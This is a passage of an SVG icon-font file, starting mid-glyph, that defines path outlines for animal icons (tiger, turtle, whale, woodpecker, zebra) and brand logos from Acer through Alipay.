14-8 8-11 7-16-2-5-10-7-20-10-31-4 17 0 44 9 58 6 9 14 8 21 3 8-5 12-2 17 4 10 13 17 26 15 44-2 13-1 27 2 40 2 11-1 20-6 30-9 15-17 32-19 50 0 5-1 10 2 15 4-8 8-17 12-25 6-12 15-21 29-26 17-5 22-14 19-31-1-12-4-23-7-35z m-519-44c4 16 4 31-1 47-3 12-6 25-7 38 0 11 4 20 15 23 25 7 36 27 44 49 1 2 1 3 3 6 3-14 0-26-3-37-4-12-10-23-16-34-4-7-6-14-5-22 3-19 3-38 3-56-1-11 12-34 21-38 3-1 6 1 9 3 14 7 22 3 27-12 6-15 8-31 5-48-3 9-5 18-9 27-6 12-8 13-18 4-7-6-13-11-22-14-10-3-16 0-19 11-2 11-11 19-17 29-4 6-9 4-14-3-1 11 1 19 4 27z m570 15l6-31c0-2 3-6-4-5-6 2-6-6-6-10-4-18-10-35-22-49 7 19 2 39 4 58 0 5-1 10-4 14-11 21-10 44-5 66 1 6 2 12 3 18 4 26-4 47-23 65-3 3-6 5-5 10 2 30-2 60-22 87 16-9 37-40 60-91-3-3-6 2-10 0 11-18 20-36 26-55 2-5 3-11 5-16 0-1 1-4-1-4-13 0-8-10-7-15 2-9 6-18 9-27 1-2 7-7-2-7-4 0-2-5-2-8z m-627-30c2 9 5 18 6 28 0 3 6 11-5 10-2 0 0 4 0 6 4 9 8 18 10 27 1 6 7 15-6 17-4 0-1 4-1 7 7 24 17 47 31 68-4 1-7-3-12-1 18 31 31 66 59 90-18-26-22-55-20-86 1-4-1-7-4-9-22-20-28-44-22-72 1-9 3-17 4-26 2-13 3-27-4-40-11-25-8-51-5-76 1-3 3-5 1-8-11 14-18 31-21 48-1 5 2 14-9 11-3-1-2 4-2 6z m236 93c-3 4-4 9-4 13 0 16-8 28-19 38-11 12-22 14-35 6-20-11-40-22-66-19 9-11 17-19 22-33 1 5 1 7 2 9 1 4 2 9 7 9 6 1 7-4 10-8 5-8 3-13-2-19-13-17-21-36-20-58 7 11 13 23 22 33 8 8 17 15 29 13 8-1 14-1 21 1 3 2 6 3 9-1 2-3 1-6-1-9-5-7-11-13-18-18-6-5-13-9-21-16 22 2 37 12 52 25-4-26-15-51 4-73-1 19 5 37 11 54 8 18 7 36-3 53z m-24-4c-5-3-10-4-17-4-12 0-23 5-31 16-7 12-2 26 11 30 17 5 41-5 49-20 3-7-2-18-12-22z m279 27c7-2 6-9 7-14 1 0 1-1 2-2 4 12 13 20 20 30-20 0-38 4-54 14-24 17-39 13-56-11-5-8-8-16-9-25 0-5 0-10-3-14-12-19-11-38-2-59 6-16 12-33 9-51 19 23 9 48 5 73 38-22 38-22 50-21-3 2-6 4-9 6-10 7-19 15-27 25-3 3-5 6-2 10 3 4 6 2 9 1 5-1 9-3 13-2 19 6 31-4 42-18 6-9 11-18 17-29 1 26-8 46-23 63-7 9 1 13 2 19 1 4 5 6 9 5z m-32-26c-15-9-35-7-45 5-6 7-7 14 1 21 9 8 19 17 30 17 15 0 25-7 28-16 3-9-3-20-14-27z m174-143c-13-20-3-41-6-62-4 8-7 15-18 14-13-2-24-7-32-18-4-6 1-11 4-16 4-8 10-14 11-24-23 10-23 10-28-10-5 11-11 7-20 6-16-2-28-9-42-14 2 2 4 3 5 5 7 7 6 13-3 17-7 4-16 4-26 5 12 6 21 4 31 2 15-5 30-6 44 2 4 3 11 5 11 11 0 6-5 8-9 11-10 6-21 12-30 18-14 10-23 22-21 40 4-2 4-7 6-11 9-14 28-24 46-21 11 2 13 5 12 16-3 16-2 27 3 41 3-8 3-15 4-22 6-30 13-33 37-14 8 7 15 15 21 24z m-480-97c-5 0-10-1-15-2-7-1-14-2-16-10-2-7 5-10 10-15-7 1-10 4-14 6-8 4-15 9-24 7-2-1-4 0-5 1-9 7-15 5-19-6-4 6-1 16-10 17-7 1-12-4-19-7 1 9 6 16 11 23 8 13 7 18-6 26-5 3-9 5-14 7-14 5-19 2-24-11-4 5-6 7-4 12 5 15 4 29-2 43-1 2-1 4-2 5 10-14 21-24 36-32 9-5 13-4 17 6 5 12 6 25 8 41 7-15 6-28 5-41-2-13 1-17 14-18 20-2 38 9 46 29 1 1 1 2 3 3 1-13-3-23-11-32-7-7-15-12-24-17-6-4-13-7-19-12-8-6-8-11 1-16 12-8 25-12 39-8 9 3 18 5 27 4 4 1 8 1 11-3z m143 282c-12 7-16 7-34 0 8 17 35 29 52 22 2 0 3-1 5-1 20 6 41-2 54-22-12 6-23 10-35 1 28-11 32-14 36-29-12 8-24 12-37 12-7-1-11-3-11-11-2-16-3-32-9-48-5 5-5 11-5 17-2 10-4 21-5 32 0 7-3 9-10 9-13 1-26-2-37-10 5 19 20 23 36 28z m5-248l0-1h0v1s0 0 0 0z m0 0c-17 5-33 11-48 21-18 11-21 25-9 44 3 5 6 11 9 16 3-2 2-4 2-5 0-15 2-22 18-22 14 0 26-3 38-11 4-2 7-2 11 0 12 8 25 10 38 12 17 2 17 2 18 20 1 1 0 3 3 4 5-8 12-16 14-26 4-12-2-24-14-32-15-9-31-16-48-21-4 14 6 22 15 30 6 6 13 7 21 8 3 1 7 0 7 4 1 3-2 6-5 8-3 2-7 2-11 2-12-2-23-6-34-11-6-3-11-3-18 0-11 5-22 10-34 11-7 0-15 0-16-8-1-8 8-6 12-6 20-4 33-20 31-38z m31 0c1 0 1 0 1 0l0-1c0 0-1 1-1 1z m-215 393c13 20 31 33 50 44 24 13 50 22 76 28 12 3 20 8 25 21 11-15 25-23 44-13-6-16-17-22-32-24-27-2-53-7-79-14-30-10-58-23-84-42z m204 79c20-7 28-5 45 13 4-13 14-18 27-21 31-7 61-18 88-36 14-9 26-20 37-37-4 3-6 4-8 6-42 30-89 44-140 50-6 1-13 2-20 3-13 2-23 8-29 22z m-322-67c0-2 0-4 0-6-8 12-7 53 0 67 3 4 7 6 12 7 29 7 85-16 102-41 3-5 5-9 5-17-16 16-33 27-53 33-37 12-61-4-66-43z m525 17c-2-2-5-4-8-6 0 10 5 16 11 22 25 24 55 36 90 36 14 0 18-4 21-18 5-20 4-39-1-61-2 10-2 18-4 25-7 25-28 36-55 31-21-5-38-15-54-29z m-127-417c20 20 22 43 9 68 10-2 13-8 15-15 3-8 5-17 7-25 2-7 6-11 14-9 9 2 13 7 10 16-4 15-6 31-6 47-1 17 8 35 23 42-5-10-11-19-12-30-1-15 3-29 7-43 1-7 4-13 5-20 3-12-4-22-16-21-19 1-37-4-56-10z m-159 0c-5 1-7 1-10 2-14 5-29 9-45 7-15-1-22 10-18 25 2 11 6 22 9 33 5 20 3 39-9 56 8-2 13-6 16-15 10-23 8-45 1-69-3-12-1-17 9-20 7-2 11 1 14 8 2 8 4 17 7 25 2 6 5 13 14 16-10-25-10-48 12-68z m389 378c0-23-8-43-21-63-11 26-26 45-42 65 14-9 27-20 39-32 14 20 13 48-2 65 15-3 25-16 26-35z m-599-63c-14 22-23 43-21 67 2 17 11 27 27 32-10-9-14-20-13-32 0-12 2-23 9-34 12 12 25 23 40 32-16-20-32-40-42-65z m114-284c6-12 13-25 24-33 8-6 17-12 27-2 2 1 3 1 4-1 10-12 25-15 39-18-13-6-27-4-41-2-11 2-22 5-32 10-18 10-22 28-21 46z m311-52c-18-5-37-9-56-3 15 4 29 7 39 19 2 2 3 2 5 0 7-8 15-4 23 1 13 8 21 21 28 38 1-32-10-47-39-55z m-54-27c25 0 47 8 69 21-7-20-15-26-34-25-12 1-24-3-35 4z m-235 21c23-13 45-21 73-19-7-6-12-6-17-6-10 0-19-1-29-1-11 1-17 6-27 26z m40 247c0-7-7-19-10-18-5 0-11 13-10 19 1 5 3 10 6 13 1 2 3 4 5 3 3-2 0-3-1-5-1-3 0-6 3-5 9 4 5-5 7-7z m247-3c-1-6-3-12-10-15-3-2-10 10-10 18 0 5 3 10 6 14 1 1 3 4 5 3 3-2 0-4-1-5-1-4 0-6 3-5 9 1 7-6 7-10z" />
<glyph glyph-name="tiger" horiz-adv-x="1000" unicode="&#xe891;" d="M231 425c-8-17-12-35-16-54-4-20-6-41-11-61-6-23-15-44-30-62-26-31-70-30-94-9-9 8-15 19-17 32-1 5 0 9 2 13 1 3 4 4 7 4 3-1 4-3 5-6l1-6c6-24 33-35 55-23 13 6 19 18 24 30 12 24 15 51 19 77 4 31 7 62 15 92 10 35 31 62 65 77 22 9 43 20 67 24 15 2 31 0 46-1 28-2 54-11 81-16 18-3 36-3 54-5 22-1 43-5 64-9 9-2 17-3 25-4 12-1 22 3 31 8 15 8 30 13 46 13 6 0 13-1 19-3 12-3 23-1 35 3 13 6 27 10 41 16 13 6 27 5 40 8 7 1 14 3 22 2 2 0 3 1 4 3 1 3 2 6 4 8 5 9 14 10 21 3 5-4 8-8 10-15 1-6 4-10 9-13 14-9 24-22 33-35 6-8 8-17 8-26 0-7 2-13 7-19 7-9 11-19 14-30 2-5-2-10-6-13-5-3-7-9-12-12 0 0-1-2-1-3-2-8-6-13-14-14-10-2-18 0-25 8-4 4-7 7-11 11-6 4-9 4-15 0-7-5-15-7-24-9-13-2-27-2-38-12-7-6-12-12-15-21-9-24-13-50-22-74-9-26-16-52-20-79-3-18-1-36 11-52 7-9 16-11 26-12 9-1 17-1 25-6 5-3 8-7 10-12 2-5-1-10-6-12-12-6-25-7-38-8-10-1-19 1-28 6-10 4-18 11-28 15-8 2-12 9-14 16-5 27-15 53-23 79-2 7-4 13-6 21-5-15-16-25-22-37-6-13-5-27-3-40 1-6 7-7 13-8 5 0 11-1 15-4 7-3 8-7 3-13 0 0 0 0 0 0-1-4-2-9-8-10-9-1-19-5-29-2-3 1-6 2-9 3-13 2-18 6-19 19-1 10-3 18-7 26-4 8-5 16 0 24 8 12 9 26 10 39 0 9 0 18-1 26-1 4-2 7-6 7-11 0-20 4-28 9-15 9-31 10-47 6-27-7-53-3-79 5-9 4-20 6-30 7-10 1-16-2-21-11l-17-38c-7-15-17-28-25-41-4-7-7-13-9-20-4-11 0-20 7-29 10-12 23-21 39-24 9-1 16-6 21-13 6-6 5-11-3-14-1 0-2-1-2-1-6-7-13-6-20-5-1 0-2 0-3 0-9-5-19-3-29 0-1 0-3 1-4 2-11 12-25 20-34 33-7 9-14 19-22 28-5 5-7 13-5 21 4 16 7 33 4 51-1 4-2 4-5 2-26-12-40-33-42-61-1-14 3-18 15-23 7-3 14-7 19-14 5-9 3-13-6-15-1-1-1-1-2-1-4-7-10-5-16-5-8 1-15 1-22 2-5 1-10 4-13 8-2 5-6 10-9 14-7 8-7 18-6 27 2 14 1 29 1 43-1 9 4 18 11 24 9 9 15 19 20 30 6 15 8 30 9 46 1 24-4 48-11 71-3 7-3 15-5 23z" />
<glyph glyph-name="turtle" horiz-adv-x="1000" unicode="&#xe892;" d="M518 564c82 0 153-38 209-104 48-54 79-117 104-184 2-5 2-7-4-9-18-8-37-16-56-24-3-1-6-1-9 2-21 20-42 40-63 60-3 3-5 7-5 11 2 28 0 56 0 85 0 6 2 10 7 14 7 6 13 12 19 18 4 3 9 6 3 12-6 7-9-1-12-3-5-4-11-9-15-14-6-6-11-7-18 0-26 21-53 43-79 64-6 4-6 9-6 15 0 6 0 12 0 18 0 4-2 5-6 5-3 0-5-1-5-5 0-1 0-2 0-3 4-19-5-31-20-41-19-14-36-29-54-44-5-4-8-5-13 0-19 16-38 32-58 48-4 4-6 8-6 13 1 11 0 21 0 31 0 4 0 6-5 6s-6-3-6-6c0-11 0-21 0-32 0-5-1-9-6-12-25-19-49-39-74-58-5-5-8-3-12 1-10 13-22 26-32 38-3 4-6 6-11 2-5-4 0-6 2-9 13-16 27-31 40-47 4-4 6-8 6-14-1-21-1-42 0-63 0-5-2-9-6-12-12-10-24-21-36-32-4-4-7-3-11 1-27 25-54 51-81 76-3 3-6 5-3 10 19 31 35 65 65 89 51 43 110 71 174 88 26 6 51 9 83 9z m312-313c-11-37-22-73-33-109-2-4-4-6-9-6-37 0-73 0-109 0-9 0-9 3-6 9 4 8 10 14 17 20 3 3 7 6 13 10-28-5-54-9-80-11-51-5-103-6-154-2-44 3-86 9-128 19-6 1-9 0-11-5-6-12-12-23-18-34-2-5-5-6-10-6-29 0-59 0-88 0-6 0-8 1-7 8 2 21 14 38 32 49 9 5 6 9 0 13-19 17-41 27-64 36-30 13-60 24-90 34-19 6-28 24-19 41 11 20 28 36 49 46 17 9 36 6 54-1 25-10 45-26 64-45 32-30 62-61 93-92 5-4 9-7 15-9 72-26 147-36 223-31 92 5 179 27 262 65 1 1 2 1 4 1z m-683 93c1 8-3 12-13 13-11 1-22-9-23-19-1-9 5-17 14-18 9-1 21 12 22 24z m366 19c0 16 1 33 0 49 0 5 2 9 6 13 20 18 41 35 61 54 5 4 8 3 12-1 28-22 56-45 84-68 4-3 5-7 5-12 0-27 0-53 1-79 0-6-2-11-7-15-26-21-51-41-77-62-5-4-8-4-13 0-22 20-44 39-66 58-4 3-5 6-5 11 0 17 0 34-1 52z m-16-4c1-12-1-29-1-45 1-5-1-9-5-12-16-13-33-26-49-39-4-4-7-4-11 0-27 23-54 45-81 68-3 3-3 6-3 9 0 23 0 46 0 69 0 5 2 7 5 10 23 17 46 34 68 51 5 3 8 3 12-1 19-14 38-29 58-43 5-4 7-8 7-14-1-16 0-33 0-53z m29-156c-24-1-48 0-71 2-9 0-11 3-13 12-2 20 5 34 22 44 13 8 23 17 34 26 5 4 7 3 11 0 24-20 48-40 72-60 7-6 6-13 5-19-1-7-8-5-12-5-16 0-32 0-48 0z m-96 23c0-19 0-19-19-15-10 2-21 5-32 6-36 6-56 33-80 55-3 4-1 6 2 8 12 11 24 22 36 34 3 3 5 2 8-1 27-22 54-45 80-67 8-6 3-14 5-20z m169-10c-1 6 2 10 7 15 25 19 50 39 74 59 6 4 9 5 14 0 17-17 34-33 51-48 6-6 4-7-2-10-44-16-90-24-137-27-10 0-6 6-7 11z m235 82c32-10 60-19 87-29 7-3 18-6 16-14-1-9-12-8-20-8-28-3-56-6-83-16 11 21 10 43 0 67z" />
<glyph glyph-name="whale" horiz-adv-x="1000" unicode="&#xe893;" d="M138 430c13 7 25 17 37 25 10 9 22 15 35 18 2 0 5-1 5 2 0 1-2 3-3 4-23 20-50 33-81 35-22 1-41-5-56-21-14-15-17-39-5-54 10-12 23-15 35-16 13 0 23 3 33 7z m636-213c1-11 8-16 18-20 14-7 30-7 46-7 20 0 22-3 14-22-3-5-6-11-9-16-10-14-22-27-36-38-35-26-74-39-118-28-31 8-52 29-71 53-44 57-87 115-145 159-22 17-44 31-69 42-39 17-80 30-122 34l-5 0c0 22-1 44 1 66 1 27 16 44 41 53 8 2 17 3 25 4 13 1 25 3 36 11 16 11 20 28 10 43-7 10-16 17-28 20-34 8-65-8-79-41-2-7-4-13-6-19-1 2-1 3 0 5 3 18 6 36 3 55-3 19-10 38-24 52-13 14-30 21-48 23-30 3-57-3-77-28-18-23-17-51 3-73 13-14 29-23 45-32 21-12 42-23 60-39 13-11 23-26 25-44 1-18 1-37 0-55-28 2-57 0-84-10-63-22-105-105-92-177 10-54 45-88 90-113 3-1 6-1 9-1 51-1 102-3 153-2 17 0 29 20 48 15 10-4-5-15-12-17-12-4-26-4-39-4-44 0-87 0-131 0l0-3c13-5 25-10 40-10 142 0 284 0 427 0 24 0 49 3 72 11 60 19 106 55 120 120 1 6 4 6 8 6 17-1 34-1 50 7 8 4 14 9 14 18-54-12-109-11-163 2z m-429-92c0-9-7-14-19-13 3 4 9 9 3 15-4 4-9 2-13-1 1 11 7 16 16 15 8 0 14-8 13-16z" />
<glyph glyph-name="woodpecker" horiz-adv-x="1000" unicode="&#xe894;" d="M838 587c-51 0-102-5-153-6-6 0-10 2-14 6-6 10-15 19-24 27-66 55-150 13-167-52-1-4-2-9-3-15-3 2-5 3-8 5-124 78-250 154-376 229-4 2-8 3-10 7h-2c-1-22 3-42 10-62 23-68 60-127 107-181 25-30 54-56 88-77 11-6 22-11 35-12 9 0 18-2 27-3-17-1-34 0-51-2-48-4-84-25-106-68-16-33-19-69-18-105 1-45 10-88 20-131 20-80 50-156 80-233 0 0 0-2 2-1 0 1 1 3 1 5 6 37 12 74 18 111 1 6 1 12-1 18-5 15-10 31-14 46-4 14-7 29-9 43 11-24 20-48 32-73 5 15 7 30 12 43 8 18 5 33-6 48-7 10-12 21-15 33 10-15 21-28 33-41 3-4 5-4 7 1 6 13 13 26 23 38 3 5 2 7-2 10-10 8-20 17-30 25 13-5 25-12 37-18 3-1 5-3 8 0 13 13 27 25 43 36-41 7-81 10-119 27 1 1 1 1 2 1 1 0 2 0 4-1 37-10 74-15 112-8 92 18 166 104 170 199 1 21 10 38 26 51 14 13 31 21 49 27 65 21 132 31 200 39 21 3 42 5 63 7-27 7-54 8-81 7z m-232-26c-10 0-19 8-19 18 0 11 8 19 18 19 11 0 19-8 18-19 0-10-8-18-17-18z m-298 102c49-31 98-62 147-92 2-2 5-3 7-5l2 2c-45 75-104 137-163 201-1-31 0-62-1-94 0-6 3-9 8-12z" />
<glyph glyph-name="zebra" horiz-adv-x="1000" unicode="&#xe895;" d="M456 58c5-31 0-61-11-90-6-18-13-35-25-50-2-2-4-6-8-5-3 0-3 5-4 8-10 32-20 63-34 93-17 39-44 72-74 102-24 26-49 51-67 82-48 85-47 171-8 258 7 14 14 28 23 40 4 6 9 11 15 15 2 2 5 5 8 3 3-1 1-5 2-8-1-20-6-39-8-58-5-44-9-88 9-131 12-28 31-52 51-75 27-30 58-58 84-89 22-29 41-59 47-95z m11 231c-6 36-22 68-41 99-17 25-34 50-48 78-15 28-27 58-25 91 0 3 0 6-1 9 0 3 0 8-4 9-4 1-7-3-9-6-32-42-44-89-37-141 4-34 19-65 38-93 19-29 43-56 63-85 23-34 43-70 47-113 0-3-1-9 4-10 5 0 5 6 6 10 9 38 11 77 11 113-1 14-1 27-4 39z m0 243c-7 24-12 48-4 73 9 23 9 45 0 66l-2 4-1 2c-8 14-31 13-46 12 7-20 7-40-1-61-3-7-6-15-9-22-8-18-11-37-9-57 5-35 16-68 34-99 13-24 25-49 31-76 3-11 6-21 9-32 2-6 5-6 9-1 2 2 3 4 4 6 13 29 18 59 12 90-6 33-17 64-27 95z m-282 3c8-5 15-10 22-15 8-5 16-8 25-11 3-1 6-2 9 0 2 3 1 6 0 8-2 5-4 10-5 15-2 7-4 15 2 21 6 5 14 4 21 2 6-2 12-4 18-5 12-3 19 2 19 15 1 8 0 15 0 22 1 10 5 13 14 10 6-2 13-5 19-7 11-5 14-3 18 8 3 8 4 16 6 24 2 7 4 8 10 4 5-4 8-8 13-11 7-6 9-6 13 3 7 13 10 28 9 44 0 5 1 10 0 16 0 8-3 10-11 9-13-2-25-6-36-12-57-27-108-62-151-108-6-7-12-13-17-21-2-5-3-8 2-11z m11-72c-2 20-9 38-20 54-6 8-15 10-22 3-11-10-20-21-29-32-5-7-4-11 4-15 18-9 37-13 57-16 3 3 12-4 10 6z m657-30c-4 5-8 10-13 15-71 73-143 146-214 220-14 14-27 28-50 25-6 0-9 1-11 8-8 34-34 55-60 77-17 14-27 14-33-9-4-13-10-27-13-41-3-24 2-46 17-65 3-4 7-11 14-7 6 2 3 9 4 13 2 23 3 45 5 71 24-15 31-33 27-56-3-16-12-30-21-43-11-20-24-40-28-66 15 5 22 15 30 22 20 17 39 36 61 50 10 6 20 12 30 2 39-38 78-76 120-118-47-9-87-18-127-26-31-7-45-21-49-51-4-30 4-57 17-84 3-6 7-8 13-9 16-1 31-2 48-3-7 28-19 52-22 79-2 20 1 39 23 46 34 11 68 15 103 20 6 0 11-1 12-7 1-5-2-10-7-12-13-4-26-9-39-13-55-17-60-27-44-84 2-6 4-11 5-17 4-20 22-17 33-15 13 3 2 15 0 23-2 10-5 20-8 29-7 19-1 32 19 37 26 6 53 10 80 15 5 1 13 1 14-7 1-6-4-11-9-13-13-5-26-9-39-13-27-8-32-20-26-48 9-39 41-44 71-52 30-7 66 12 85 42 18 28-1 46-18 65z m-196 125c1 17-10 24-26 25-16-1-29-7-29-25-1-15 9-23 24-23 16 0 30 5 31 23z" />
<glyph glyph-name="brand-acer" horiz-adv-x="1000" unicode="&#xe896;" d="M998 459c-3 5-7 9-24 10-5 1-20 1-44 1-66 0-110-20-133-59 6 39-32 59-115 59-97 0-158-39-182-118-9-29-10-53-3-71l-23-2c-18-1-42-3-56-3-36 0-58 6-67 18-7 11-6 31 3 60 14 48 51 70 110 70 30 0 60-3 60-3 4 0 6 4 6 8l-1 4-2 17c-1 10-9 17-24 19-13 0-23 1-37 1h-1c-77 0-131-25-161-76 11 51-24 76-107 76-46 0-79-1-99-4-15-2-24-8-28-19l-6-21c-1-3 1-5 5-5h1c3 0 17 1 41 3 31 3 55 4 70 4 46 0 65-11 58-34-2-5-5-8-11-9-43-7-77-12-102-16-71-9-112-31-123-66-15-48 23-72 114-72 45 0 83 2 114 7 18 3 27 8 31 19l16 54c-1-54 36-81 114-81 33 0 65 1 80 4 16 3 23 6 27 18l3 17c17-26 53-38 109-38 59 0 93 1 103 5 8 2 13 6 15 12 0 1 0 2 1 4l7 23c1 4-1 5-6 5l-37-2c-26-1-45-2-60-2-26 0-45 2-55 6-15 6-22 17-21 34l119 15c54 7 90 24 108 50l-41-141c-1-3 0-5 1-6 2-2 4-3 8-3h49c9 0 12 4 13 8l44 152c6 20 24 30 56 30 29 0 51 0 65-1h1c3 0 8 1 10 8l8 21c2 4 1 7-1 10z m-796-183c-16-2-38-3-67-3-50 0-72 10-66 30 5 15 18 24 40 26l114 16-21-69z m528 124c-5-16-27-27-67-32l-95-14 2 8c8 26 19 43 34 52 14 10 38 14 70 14 43 0 62-9 56-28z" />
<glyph glyph-name="brand-adidas" horiz-adv-x="1000" unicode="&#xe897;" d="M193 228l-193-115 29-49h263l-54 89-45 75z m644 108l-181 300-192-116 118-196 156-260h262l-163 272z m-413 96l-192-116 6-10 146-242h262l-64 107-158 261z" />
<glyph glyph-name="brand-adobe" horiz-adv-x="1000" unicode="&#xe898;" d="M5 788v-876l366 876h-366z m506-700l70-176h152l-233 553-160-377h171z m118 700l366-876v876h-366z" />
<glyph glyph-name="brand-air-new-zealand" horiz-adv-x="1000" unicode="&#xe899;" d="M967 452h-711s54 79 170 194c29 28 105 101 182 101 51 0 90-32 90-78 0-44-36-57-36-57 3 19-8 71-56 71-50 0-71-40-71-66 0-56 47-95 103-95 106 0 156 80 156 157s-72 161-186 161c-106 0-204-81-259-138-198-203-302-342-302-342h880l40 92z m-418-437c0 85-63 142-136 142-79 0-95-63-95-79 0-35 29-69 64-69 58 0 62 48 62 48s18-12 18-43c0-29-24-67-80-67-44 0-109 23-154 123-53 116-57 149-57 149h696l40 94-875 1s46-139 107-272c52-114 138-182 243-182 100 0 167 80 167 155z" />
<glyph glyph-name="brand-airbnb" horiz-adv-x="1000" unicode="&#xe89a;" d="M942 143c-5 12-9 25-14 36-8 17-16 34-23 49l-1 1c-68 148-140 297-217 444l-2 6c-8 15-16 30-24 46-10 18-20 37-35 54-32 39-77 61-125 61-49 0-93-22-126-59-14-17-25-36-35-54-8-15-15-31-23-46l-3-6c-76-147-149-296-217-443l-1-2c-7-16-15-33-22-50-5-11-10-23-15-35-13-37-17-71-12-106 11-74 60-136 128-163 25-11 52-16 79-16 8 0 18 1 26 2 32 4 65 15 98 33 40 23 78 55 121 102 43-47 82-79 122-102 32-18 65-29 98-33 8-1 17-2 25-2 28 0 55 5 80 16 68 27 117 90 127 163 8 34 4 68-9 104z m-442-51c-53 67-87 130-99 183-5 23-6 42-3 60 2 16 8 30 16 41 18 27 50 43 86 43s69-16 87-43c7-12 13-25 15-41 3-18 2-38-3-60-12-52-46-115-99-183z m392-46c-7-51-42-95-90-115-23-9-49-13-74-9-25 2-49 10-75 25-35 19-70 50-111 95 64 80 104 152 118 217 7 30 8 58 5 84-3 24-13 47-26 66-31 44-81 70-138 70-57 0-108-27-138-70-14-19-23-42-27-66-4-26-3-55 5-84 15-65 55-138 119-218-40-45-77-76-112-95-25-15-50-23-74-26-27-3-52 1-75 10-48 19-82 64-89 115-3 25-1 49 9 77 3 9 8 19 13 31 7 16 14 32 22 49l1 2c68 146 141 295 216 441l3 6 23 45c8 16 17 30 28 43 20 23 48 36 78 36 31 0 58-13 79-36 10-13 19-27 27-43l24-45 3-6c74-146 147-296 214-442v-1l23-49c5-12 10-22 13-31 6-26 9-50 6-76z" />
<glyph glyph-name="brand-aircell" horiz-adv-x="1000" unicode="&#xe89b;" d="M522 178c-59-4-118-4-177 1s-117 15-175 28c-57 12-113 30-170 45 96-75 327-133 486-123 137 9 264 51 384 124-60-17-116-36-173-48-58-13-117-23-175-27z m-271 145c131-54 266-72 405-46 114 22 214 72 302 147-223-123-460-150-707-101z m520 90c92 30 168 83 229 159-142-118-306-170-489-171 88-18 175-16 260 12z" />
<glyph glyph-name="brand-airtel" horiz-adv-x="1000" unicode="&#xe89c;" d="M983 541c-1-68-17-133-44-196-39-92-96-171-166-242-64-65-135-122-211-172-43-28-87-53-135-68-28-9-56-14-85-13-36 1-62 19-81 49-20 30-24 64-16 98 16 66 43 125 91 174 24 24 53 40 88 42 24 2 46-2 66-16 4-3 7-6 10-10 10-11 14-24 9-39-7-26-23-46-41-66-31-33-62-66-92-101-16-18-28-38-33-63-3-19 7-32 26-34 11-1 21 1 31 5 59 23 111 56 161 95 66 52 127 109 180 174 45 54 79 114 97 182 12 44 15 89 1 133-5 16-13 31-24 45-15 22-38 31-64 33-32 2-62-8-92-21-44-19-86-44-126-71-69-46-136-93-201-145-29-23-58-48-90-67-24-15-48-27-76-32-54-8-95 14-126 57-23 32-26 68-19 106 7 44 28 83 53 119 48 73 110 132 180 184 83 62 174 111 274 144 48 16 98 27 149 25 65-2 126-18 181-54 66-43 103-106 118-182 4-24 7-47 7-73z" />
<glyph glyph-name="brand-alcatel" horiz-adv-x="1000" unicode="&#xe89d;" d="M720 850h-440c69-154 139-307 222-456 74 153 146 304 218 456z m-423-1000h406c-68 138-136 274-205 414-68-140-134-277-201-414z" />
<glyph glyph-name="brand-alibaba" horiz-adv-x="1000" unicode="&#xe89e;" d="M999 284c0 0-1 0-1 0-47-20-94-39-143-56-46-16-93-29-141-39-29-6-59-10-89-13-12-1-23-3-35-1-14 2-19 10-14 23 0 1 0 2 0 2 4 10 10 18 16 26 25 33 53 64 78 96 22 27 43 54 60 84 12 21 23 44 25 69 1 20-2 40-13 57-12 21-30 35-51 45-19 8-39 14-59 17h0c-70 14-143-3-143-3-36-6-71-16-106-28-54-18-105-42-154-72-76-47-139-108-188-183-13-20-25-41-32-63-1-2-2-4-2-6 0 0-20-52 7-87 1-1 1-1 1-1 9-13 21-24 37-32 12-6 24-10 37-13 0 0 44-12 112 0h0c23 3 46 8 68 14 45 12 88 31 130 53 1 0 1 1 1 1-1 0-2 0-2 0-58-15-115-27-175-30-19-1-39-1-59 1l-1 0c-2 0-5 1-8 1-5 1-11 2-17 4l-2 0c-1 0-1 1-2 1-27 8-36 22-38 28-3 7-3 14-1 21 4 10 10 19 18 27 21 21 46 36 73 47 3 1 4 2 4 5-1 18 0 36 0 53 0 5 0 5 4 4 21-7 42-11 63-12 36-2 71 4 104 18 18 7 35 17 51 28 3 2 4 2 5-1 1-3 2-7 3-11 0-3-2-6 0-8 3-1 6 0 9 0 2 0 3 1 3 3 1 10-2 19-7 27-7 12-22 21-34 20 5-4 9-8 14-13 2-2 3-3-1-5-7-5-14-10-22-14-26-14-54-23-84-26-20-2-40-1-60 3-7 1-15 3-21 5 15 15 30 31 45 47 3 2 4 4 2 8-4 9-7 19-11 29-1 2 0 3 2 4 19 6 38 12 56 19 55 18 110 33 166 46 26 6 52 11 79 16 7 1 15 3 24 4-11 9-21 17-31 26 4 3 8 5 12 8 2 1 4 2 7 1 20-6 41-12 60-19 18-6 35-12 50-23 11-7 19-16 22-30 1-2 0-5 1-8 0-8-3-15-6-23-7-17-18-33-29-48-29-40-61-76-93-112-20-23-40-46-58-71-10-16-20-32-24-51-3-19 1-35 17-47 11-9 24-11 38-12 23-2 46 1 68 6 37 7 73 18 108 31 82 30 162 67 239 109 13 8 27 15 39 24 0 0 0 0-1 0z" />
<glyph glyph-name="brand-aliexpress" horiz-adv-x="1000" unicode="&#xe89f;" d="M780 113c-29-4-54-24-65-52-14-30-6-69 17-92 14-14 32-22 51-26 18-3 37 4 54 13 30 18 47 56 39 90-8 43-53 74-96 67z m-451-86c0-47-37-84-84-84s-83 37-83 84 37 83 83 83 84-37 84-83z m-158 667c-4 12-6 25-10 38-8 17-28 26-46 26-38 0-77 0-115 0 41-133 82-267 122-400 23-74 45-148 69-221 208 0 416 0 624 0 24 0 47 12 60 31 14 20 20 45 21 69-143 1-285 0-428 0-52 1-104-1-156 1-8 27-27 86-28 91-26 88-54 176-79 264 205 0 411 0 616 0-7-41-17-81-25-122-2-9-4-18-11-25-9-9-23-11-35-11-133-1-267-1-401-1 11-32 21-65 32-96 155 0 309 0 463 0 31 0 62 15 79 41 15 24 18 52 25 79 17 78 35 157 52 236-276 0-553 0-829 0z" />
<glyph glyph-name="brand-alipay" horiz-adv-x="1000" unicode="&#xe8a0;" d="M149 270c-76-66-30-187 124-187 89 0 179 57 249 149-100 49-185 83-276 74-25-2-71-13-97-36z m688 573h-673c-88 0-159-71-159-158v-672c0-87 71-158 159-158h673c87 0 158 71 158 158v7s-257 107-387 169c-88-107-200-172-317-172-198 0-265 173-171 286 20 25 55 49 109 62 84 21 218-13 344-54 23 41 42 87 56 136h-388v39h200v70h-242v39h242v100s0 17 17 17h98v-117h239v-39h-239v-70h195c-19-77-47-147-83-209 60-21 113-41 153-54 142-48 175-50 175-50v512c0 87-71 158-159 158z" />
